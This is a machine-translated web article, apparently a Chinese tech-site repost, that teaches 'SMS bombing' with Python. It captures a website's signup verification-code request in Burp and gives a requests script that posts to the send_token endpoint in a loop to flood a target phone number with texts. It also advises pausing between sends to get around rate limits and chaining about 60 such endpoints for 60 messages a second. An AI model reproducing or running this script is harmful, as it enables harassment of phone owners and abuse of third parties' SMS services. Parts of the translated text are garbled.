Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to realize the bombing function of SMS with python

2025-03-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to use python to achieve SMS bombing function". The content of the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "how to use python to achieve SMS bombing function".

First

This is a website where his business exists to send text messages.

At this point, we open the artifact burp or other bag grabbing tools (it is best to use burp, because the repeater module can meet our needs)

At this time, I put an agent on my Firefox, and then burp turns on the intercept.

Caught a packet and sent it to repeater

Enter repeater to analyze the packet

{"mobile": "13xxxxxx", "type": "signup"}

This is the data sent. Go starts.

If you look at the returned packet, you can see that it is successful

Then we started to write our python to circulate and send packets to bomb the target.

Import requestsimport jsonheaders = {'User-Agent':' Mozilla/5.0 (Windows NT 6.1; Win64; x64) Rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer':' http://www.demlution.com/'}#data = # print datar = requests.post ('/ capi/v1/dmhome/send_token',data=json.dumps ({"mobile": "Mobile number", "type": "signup"}), headers=headers) print (r.text)

First test, after the completion of the test can for cycle to enhance the power of the script, after my research found that when a number submitted many times will be ban, for example, I sent 10 packets at a time (that is, sent 10 text messages) after the number will not be sent again, even if the returned packet status is successful, but the text message is not sent, in fact, we can pause for ten seconds before sending the next one, so that we will not be ban That's what the test knows.

All right, I'll talk about this today. Maybe you will say that just one number, I'll just join the blacklist and ok. It's true, but we can dig into this type of website, and then send it one interface at a time, 60 interfaces, 60 text messages a second. The power is still OK, with successful pictures attached.

Thank you for reading, the above is the content of "how to use python to achieve SMS bombing function". After the study of this article, I believe you have a deeper understanding of how to use python to achieve SMS bombardment function, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report